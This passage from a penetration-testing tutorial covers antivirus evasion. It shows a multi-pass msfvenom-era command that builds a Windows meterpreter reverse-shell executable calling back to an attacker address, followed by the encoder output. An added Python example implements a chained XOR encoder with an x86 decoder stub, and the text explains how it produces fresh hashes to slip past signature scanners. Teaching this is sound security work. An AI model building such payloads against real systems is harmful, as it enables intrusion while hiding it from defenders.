Chapter 7
Test the resulting executable against an evaluation copy of the target's antivirus product to see whether it bypasses detection before relying on it in a penetration test; vendors add signatures continually, so a build that passes today may be caught later. (In current Metasploit releases msfpayload and msfencode have been merged into msfvenom, whose -e and -i options select the encoder and the iteration count.) Here's an example of using multiple encoding passes:
root@bt:/opt/framework3/msf3# msfpayload windows/meterpreter/reverse_tcp \
    LHOST=192.168.1.101 LPORT=31337 R | \
    msfencode -e x86/shikata_ga_nai -c 5 -t raw | \
    msfencode -e x86/alpha_upper -c 2 -t raw | \
    msfencode -e x86/shikata_ga_nai -c 5 -t raw | \
    msfencode -e x86/countdown -c 5 -t exe -o /var/www/payload3.exe
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 426 (iteration=5)
[*] x86/alpha_upper succeeded with size 921 (iteration=1)
[*] x86/alpha_upper succeeded with size 1911 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 1940 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 1969 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 1998 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 2027 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 2056 (iteration=5)
[*] x86/countdown succeeded with size 2074 (iteration=1)
[*] x86/countdown succeeded with size 2092 (iteration=2)
[*] x86/countdown succeeded with size 2110 (iteration=3)
[*] x86/countdown succeeded with size 2128 (iteration=4)
[*] x86/countdown succeeded with size 2146 (iteration=5)
root@bt:/opt/framework3/msf3#
Here we use five counts of shikata_ga_nai, feeding the code in raw format into two counts of alpha_upper encoding, which is then fed to another five counts of shikata_ga_nai, followed by five counts of countdown encoding, before finally directing the output into the desired executable. We are using a total of 17 encoding loops in an attempt to circumvent the antivirus software. Each loop prepends its own decoder stub, and the size column shows the cost: shikata_ga_nai adds 27 to 29 bytes per iteration and countdown adds 18, while alpha_upper more than doubles the payload on each pass because it rewrites every byte as printable uppercase characters, so the payload has grown to 2,146 bytes by the last pass. And, as you can see in Figure 7-3, we have successfully slipped our payload past the antivirus engine.
Figure 7-3: AVG has not detected the multi-encoded payload.
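To make concrete what each of those 17 loops actually does to the bytes, the following is an added example, written for this page and not taken from Metasploit: a toy single-byte XOR encoder for 32-bit x86 with a hand-assembled JMP/CALL/POP decoder stub, chained the way `msfencode -c N` chains iterations. It reproduces the pattern visible in the log above (a fixed stub overhead per pass, a different output each run for the same input, bad-character avoidance for the encoded body) and verifies every layer by simulating the stub's XOR loop in Python. The stub layout, the `SAMPLE_PAYLOAD` bytes (a constructed stand-in, never executed) and the `x86/xor_toy` name in the printed progress lines are all assumptions of the example.

```python
"""Toy single-byte XOR encoder chain, modelled on what each msfencode pass
does: prepend a decoder stub, transform the bytes behind it, and grow the
blob by a fixed stub overhead. Added illustration, not Metasploit's code."""
import hashlib
import random
import struct

STUB_LEN = 22  # bytes every pass adds (shikata_ga_nai above adds 27 or 29)

# Hand-assembled 32-bit x86 decoder (offsets within the stub):
#  0  EB 0F            jmp  short +0x0F     ; to the call below
#  2  5E               pop  esi             ; esi = address of encoded body
#  3  B9 <len32>       mov  ecx, len
#  8  80 74 0E FF <k>  xor  byte [esi+ecx-1], key
# 13  E2 F9            loop -7              ; back to the xor until ecx == 0
# 15  EB 05            jmp  short +5        ; over the call, onto the body
# 17  E8 EC FF FF FF   call -0x14           ; pushes body address, lands on pop esi
# 22  <encoded body>
STUB_HEAD = bytes([0xEB, 0x0F, 0x5E, 0xB9])
XOR_OPCODE = bytes([0x80, 0x74, 0x0E, 0xFF])
STUB_TAIL = bytes([0xE2, 0xF9, 0xEB, 0x05, 0xE8, 0xEC, 0xFF, 0xFF, 0xFF])

# Constructed stand-in for a payload (never executed here; only its bytes matter).
SAMPLE_PAYLOAD = bytes.fromhex("90909090" "31c0" "50" "6863616c63" "54"
                               "b8efbeadde" "ffd0" "c3")


def pick_key(payload, badchars, rng):
    """Pick a key so neither the key nor any encoded byte is a bad char
    (the guarantee msfencode's -b option gives for the encoded body)."""
    keys = list(range(1, 256))
    rng.shuffle(keys)          # fresh key each run: same input, new bytes out
    for key in keys:
        if key not in badchars and all((b ^ key) not in badchars for b in payload):
            return key
    raise ValueError("no single-byte key avoids the bad characters")


def encode_pass(payload, badchars=frozenset({0x00}), rng=None):
    """One encoder iteration: decoder stub + XOR-ed body."""
    key = pick_key(payload, badchars, rng or random.SystemRandom())
    stub = (STUB_HEAD + struct.pack("<I", len(payload))
            + XOR_OPCODE + bytes([key]) + STUB_TAIL)
    # Caveat: the stub's mov ecx, imm32 itself carries nulls for short
    # payloads; real encoders avoid bad chars in the stub as well.
    return stub + bytes(b ^ key for b in payload)


def decode_pass(blob):
    """Simulate what the stub does at run time, to check one layer."""
    if (blob[:4] != STUB_HEAD or blob[8:12] != XOR_OPCODE
            or blob[13:STUB_LEN] != STUB_TAIL):
        raise ValueError("not a blob produced by encode_pass")
    length = struct.unpack("<I", blob[4:8])[0]
    key = blob[12]
    body = blob[STUB_LEN:STUB_LEN + length]
    if len(body) != length:
        raise ValueError("truncated body")
    return bytes(b ^ key for b in body)


def encode_chain(payload, passes, badchars=frozenset({0x00}), rng=None):
    """Like `msfencode -c passes`: feed each output back in as the next
    input. Returns the final blob and the size after each pass."""
    blob, sizes = payload, []
    for _ in range(passes):
        blob = encode_pass(blob, badchars, rng)
        sizes.append(len(blob))
    return blob, sizes


def decode_chain(blob, passes):
    for _ in range(passes):
        blob = decode_pass(blob)
    return blob


def fingerprint(blob):
    return hashlib.sha256(blob).hexdigest()


def demo(passes=5):
    """Encode, print msfencode-style progress, verify the round trip, and
    show that re-running the same chain yields a different hash."""
    blob, sizes = encode_chain(SAMPLE_PAYLOAD, passes)
    for i, size in enumerate(sizes, 1):
        print(f"[*] x86/xor_toy succeeded with size {size} (iteration={i})")
    again, _ = encode_chain(SAMPLE_PAYLOAD, passes)
    return {
        "sizes": sizes,
        "round_trip": decode_chain(blob, passes) == SAMPLE_PAYLOAD,
        "same_hash_twice": fingerprint(blob) == fingerprint(again),
    }


if __name__ == "__main__":
    print(demo())
```

Two points the run makes that the log alone does not: the size grows by exactly one stub per iteration (here 22 bytes, which is why the sizes above climb in fixed steps), and because the key is drawn fresh each time, the same payload produces a different file and a different hash on every build, which is what defeats a scanner that only knows the previous build's signature. It also shows the limit of the approach: the decoder stub itself is constant and is exactly what a signature can be written against, which is why chaining several different encoders, as the page does, buys more than repeating one.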